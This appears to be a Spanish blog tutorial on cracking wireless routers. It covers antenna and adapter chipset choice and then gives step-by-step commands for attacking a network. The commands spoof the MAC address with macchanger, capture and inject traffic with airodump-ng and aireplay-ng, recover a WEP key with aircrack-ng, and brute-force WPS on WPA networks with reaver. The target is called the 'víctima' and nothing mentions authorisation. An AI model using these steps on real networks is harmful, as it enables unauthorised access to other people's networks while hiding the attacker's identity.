Cracking un router wireless

Herramientas

1. Antenas omnidireccionales:

Una antena omnidireccional con cero dBi sería lo más parecido a una antena isotrópica, es decir, que intente repartir la radiacción de manera homogénea.

Una antena omnidireccional con 6 dBi empezaría a achatar la parte superior e inferior de la esfera creando un volumen en forma de “donuts”. De esta manera, cuantos mas dBi tenga la antena, más se irá achatando el “donuts” consiguiendo que llegue cada vez más lejos, pero reduciendo al mismo tiempo la altura a la que llega.

 

2. Adaptador inalámbrico

ejemplo antena adaptador inalámbrico

ejemplo antena adaptador inalámbrico

Una vez que tenemos la antena, tenemos que buscar un adaptador inalámbrico para conectarlo a nuestro ordenador.

La elección de este Hardware la haremos teniendo en cuenta varios aspectos.

  • Chipset:

El chipset es el conjunto de chips concentrados para realizar las conexiones. Los mas conocidos son los siguientes

– Realtek: Es el más estándar, existen drivers para usarlo sobre GNU/Linux abiertos y está muy soportado por las herramientas de auditoría

– Atheros: No todas las herramientas funcionan con el, pero por otro lado ofrece mayor calidad en la recepción.

– Broadcom…

Debe ser capaz de inyectar, modo promiscuo, y bandas b/g/n.

Por ejemplo: Antenas b/g/n + chipset

ralink 3070 300Mb

compatible sobretodo para Kali y backtrack.

 

Reconocimiento del entorno: AIRODUMP / WASH

airodump-ng (interfaz monitor)

wash -i (monitor) –ignore-fcs

 

Rompiendo seguridad WEP

Todo lo haremos desde terminales y como root:

1º airmon-ng para ver tu tarjera inalambrica fijate si es wlan0, wlan1, etc… o eth0, eth1, etc…

2º airmon-ng stop wlan0 o eth0 (dependiendo de cual sea tu tarjeta)
3º ifconfig wlan0 o eth0 down

Esto es para deshabilitar la tarjeta de red y hacerle un cambio de mac por una que no es la tuya y que sera mas facil de recordar.

4º macchanger –mac 00:11:22:33:44:55 wlan0 o eth0
Para cambiar tu mac por esa.

5º airmon-ng start wlan0 o eth0
Para habilitar de nuevo la tarjeta.

6º airodump-ng wlan0 o eth0
Para ver la lista de redes a tu alcance y la lista se compone de una serie de columnas que son:
BSSID = mac del router de la señal
PWR = Poder de la señal
CHN = Canal en el que se encuentra la red
ENCR = Tipo de contraseña que usa (recuerda que este tuto es para la mas común, osea WEP)
ESSID = Nombre de la red
Cuando ya veas la red que te interesa pulsa Ctrl+C para parar el proceso, sombrea el BSSID con el ratón y con el click derecho escoje copiar.

Abre otro terminal para el siguiente proceso (es normal cuando hacemos cosas como esta utilizar varios terminales a la vez)

7º airodump-ng -c 6 -w prueba –bssid 66:77:88:99:00:11 wlan0 o eth0

Con esto nos ponemos en modo monitor para capturar paquetes.
Cambia el 6 (-c 6) por el numero del canal de la red elejida.
-w prueba: prueba es el nombre que le dará a los paquetes que guarde y no hace falta cambiarlo.
–bssid 66:77:88:… cambialo por la mac que sombreaste con el raton, osea pegar…

Ahora ya estas capturando paquetes (DATA) para en un rato poder pedir la contraseña lo malo es que necesitas como poco 20.000 paquetes y seguramente va muy lento asi que…

Vamos a asociarnos a esa red y a inyectar trafico desde otro terminal con:
8º aireplay-ng -1 0 -a 66:77:88… (pega el bssid del raton) -h 00:11:22:33:44:55 -e ejemplo (cambia ejemplo por el ESSID de la red que te interesa) wlan0 o eth0

En resumen: aireplay-ng -1 -0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Para asociarnos, cuando te salgan 4 lineas de codigos y te diga conexion succesfuld quiere decir que ya estas conectado y puedes inyectar, de lo contrario las causas pueden ser varias y la mas comun es que tu tarjeta de red no pueda inyectar.

Ahora inyectaremos con:
9º aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0 cambiando el 66:77:… por la del raton
Y con esto deberian empezar a subir los paquetes en DATA a todo trapo.

Cuando tengas 20.000, sin para el proceso abre otro terminal y escribe:
10º aircrack-ng prueba-01.cap
Prueba-01.cap cambia de numero por cada intento de captura que haces es decir: prueba-01, prueba-02, 03, etc…

Si tiene bastantes paquetes de saldra al final KEY FOUND!! y esa clave que te da de tantos numeros es la tuya pero aqui cambia las letras por numeros aunque tu puedes usarla como te la da eleminando los dos puntos que separan:
12:23:33:11:22 seria 1223331122.

 

ifconfig 0 down
macchanger -m 00:11 wlan0
ifconfig wlan up
airmon ng wlan0
airodump mon0
airodump-ng -c canal -w nombre del archivo –bssid victima ii:ii:ii mon0
aireplay –arpreplay -b la victima mac -h mi fake mac mon0
aircrack ng -z -b victima mac nombre del archivo*.cap
aireplay-ng -3 -x 1000 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0

 

 

Rompiendo seguridad WPA usando REAVER

ifconfig wlan0 down

ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69

ifconfig wlan0 up

airmon-ng start wlan0

reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69

Reaver –i (MONITOR) –b (MAC VÍCTIMA) –c (CANAL) –e (NOMBRE RED) –vv -a

Tags: , , , , , ,

Deja un comentario

Redes